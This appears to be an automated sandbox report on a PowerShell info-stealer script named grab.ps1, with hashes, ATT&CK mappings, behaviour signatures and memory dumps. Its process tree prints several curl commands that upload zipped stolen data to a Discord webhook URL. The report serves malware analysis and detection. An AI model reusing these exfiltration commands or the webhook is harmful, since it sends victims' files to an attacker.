9d6b004b06d43ac61aaf4c368987f2c6eef854c6f32cf5286666520ef213f2b7

Analysis

max time kernel
93s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-01-2025 12:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

i965652f-main/grab.ps1
Size

1KB
MD5

bf95bc51a62fc80294a7088fc5551bfc
SHA1

54b4805f6a1fa45179d4b8c0ef5e01f0528e11fd
SHA256

b245958d5d98d1450d65b8848ba1618e81d85c0012530796f61b0b9e107eeb6b
SHA512

b57e27a7ade7fcb79dfbe5bb3d562fab9fc0f4388696681e2b95c9c554ca00bcdd15e93f035b18e386cd0773bf2ccc72a747abf0b23ad176b8a935d220e8556d

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	1212	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs

Web Service

T1102

flow	ioc
25	discord.com
27	discord.com
30	discord.com
17	discord.com
24	discord.com
28	discord.com
29	discord.com
6	discord.com
7	discord.com

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1212	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1212	powershell.exe
1212	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1212	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 1212 wrote to memory of 3560	1212	powershell.exe	83
PID 1212 wrote to memory of 3560	1212	powershell.exe	83
PID 1212 wrote to memory of 3740	1212	powershell.exe	91
PID 1212 wrote to memory of 3740	1212	powershell.exe	91
PID 1212 wrote to memory of 4212	1212	powershell.exe	92
PID 1212 wrote to memory of 4212	1212	powershell.exe	92
PID 1212 wrote to memory of 2628	1212	powershell.exe	93
PID 1212 wrote to memory of 2628	1212	powershell.exe	93
PID 1212 wrote to memory of 428	1212	powershell.exe	94
PID 1212 wrote to memory of 428	1212	powershell.exe	94
PID 1212 wrote to memory of 2952	1212	powershell.exe	95
PID 1212 wrote to memory of 2952	1212	powershell.exe	95
PID 1212 wrote to memory of 1124	1212	powershell.exe	96
PID 1212 wrote to memory of 1124	1212	powershell.exe	96

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\i965652f-main\grab.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\bdata.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:3560
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\e.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:3740
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\exclude.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:4212
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\file.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:2628
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\grab.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:428
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\m.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:2952
- C:\Windows\system32\curl.exe
  "C:\Windows\system32\curl.exe" -F file1=@C:\Users\Admin\AppData\Local\Temp\svhost.zip https://discord.com/api/webhooks/1328938992582004777/NCObLIgTpDFoxApJ4geqLupNNh9CqmkiVQDypmNgbG3AZKV8vwV0Y9ogkx003POFrs6n
  2⤵
  PID:1124

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ngjmrpds.hrh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bdata.zip

Filesize
8.2MB

MD5
d0b7d1342139efa0ec3289b8d099a20b

SHA1
f31f2aaa915b0e4314fa798f976fa733d0ce92df

SHA256
a5997b4c6e489b7228ca7264f47f567ff31c72f0327af574d60f2066e04c1392

SHA512
ad556005f60788607e08aacc32e68839192144dfab9b24c709e0ffebf0d7a7144cde0fc591cb60a6506143513d82ffd09cfd3ee0b2f30246444b4b09c01137a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\e.zip

Filesize
918B

MD5
62b9786c158fff282b021156b27a7b60

SHA1
aff693684e44c0716283c162b85bd0766b2c9779

SHA256
8a6c4b5677d2103f9cdf3792d9ca6e8f31af7905c6be567bb630c292fe4b661e

SHA512
486ad055d0ca6ae298e7a48ab7d0f2c6a3c9f7dda774c583ef74b10d35c4e94bf920af1f87942e835d1b90747e0464591e0af2e8fa7864737e129e6dddb63626

Download Submit
C:\Users\Admin\AppData\Local\Temp\exclude.zip

Filesize
650B

MD5
2bda6ca93379b54018bcc784495a5a07

SHA1
4fead284c8f93355a55fdf05c9d25193c6f6d7c6

SHA256
8bb581d3d41ee6b16457c722e52e718840f04db316be547d6a1bf03ad883fa83

SHA512
a7d2bb9d4618c66eaae8f242a38cb3ed762c65c250b730aaf72929c2b82937ca361317b0cc30cbfb966257c0d0231200e397631e148eee9d623e79b99652ddee

Download Submit
C:\Users\Admin\AppData\Local\Temp\file.zip

Filesize
350B

MD5
d0440906cf87357bc3faa090114d1b01

SHA1
0bb71440b7324ebad7e7132a2c3c26cceaa36a07

SHA256
23969264ad1359de7d8bf343c140dd5b6d215fa799cf123de09ff398acdd6c20

SHA512
2179535d98b03a89e247409f38c3c8f5cfa653cd615856996a871e539e191044a8253413d4ca21f27c229b3513707f74ee8e5f7cc1807894741bfcda13a326ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\grab.zip

Filesize
857B

MD5
74b03bc13896a487aed181bbbc476f8f

SHA1
f4f83e811721e5e5926ee32a2a9d00c13b817317

SHA256
63234bc78c4bb2552d92cb69b0bb7e81badedaa4eee9e29648301c76d7a03e60

SHA512
352d06c0259830e04dde0e9abd9917362c64ce1ad25bdda41546985cd62bef00a81a4e4610304da5801c5dcac25c4d70a294b73e1bdbd0308c578609cad7be00

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.zip

Filesize
5KB

MD5
334904437ea65cd38eade33b838d4418

SHA1
9312ae1b2a1c6ee376d8892a0f23727ba551b012

SHA256
214fb1a40294336b54522f95a43a5402d942b088d353e7bc0c05201c2447aaf6

SHA512
b409eef509ea53b5773e461cf78e15eb5b7333cd553ad42617a447c51ee2c5d771f2a1461c09dc9f2dfa9b63201bc28f3256f66c4d79860f9c6216a6e45abcbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\svhost.zip

Filesize
722B

MD5
8875fa00ed3c27acb2fc66949141af40

SHA1
f34f4e8b7e5a2c83167128664e528ae9245f0deb

SHA256
633e94ed6900dba7b14bf5425108b963bff83e9a0e61b7154fb2619a8eb7c161

SHA512
4feed71e40c070fd3e2d12f39d2a28cafaf26221f3e8c7064adf6c471ba033e18702cabe2e3b9b178ccdf408ec9aea0a1316e7a4f6a984e6fba2712d4c7da4c6

Download Submit
memory/1212-13-0x000001CD6C0E0000-0x000001CD6C2A2000-memory.dmp

Filesize
1.8MB

Download
memory/1212-15-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download
memory/1212-18-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download
memory/1212-17-0x000001CD6BA90000-0x000001CD6BA9A000-memory.dmp

Filesize
40KB

Download
memory/1212-21-0x00007FFB308F3000-0x00007FFB308F5000-memory.dmp

Filesize
8KB

Download
memory/1212-22-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download
memory/1212-23-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download
memory/1212-16-0x000001CD6BC30000-0x000001CD6BC42000-memory.dmp

Filesize
72KB

Download
memory/1212-14-0x000001CD6C7E0000-0x000001CD6CD08000-memory.dmp

Filesize
5.2MB

Download
memory/1212-0-0x00007FFB308F3000-0x00007FFB308F5000-memory.dmp

Filesize
8KB

Download
memory/1212-12-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download
memory/1212-7-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download
memory/1212-1-0x000001CD6BAA0000-0x000001CD6BAC2000-memory.dmp

Filesize
136KB

Download
memory/1212-38-0x00007FFB308F0000-0x00007FFB313B1000-memory.dmp

Filesize
10.8MB

Download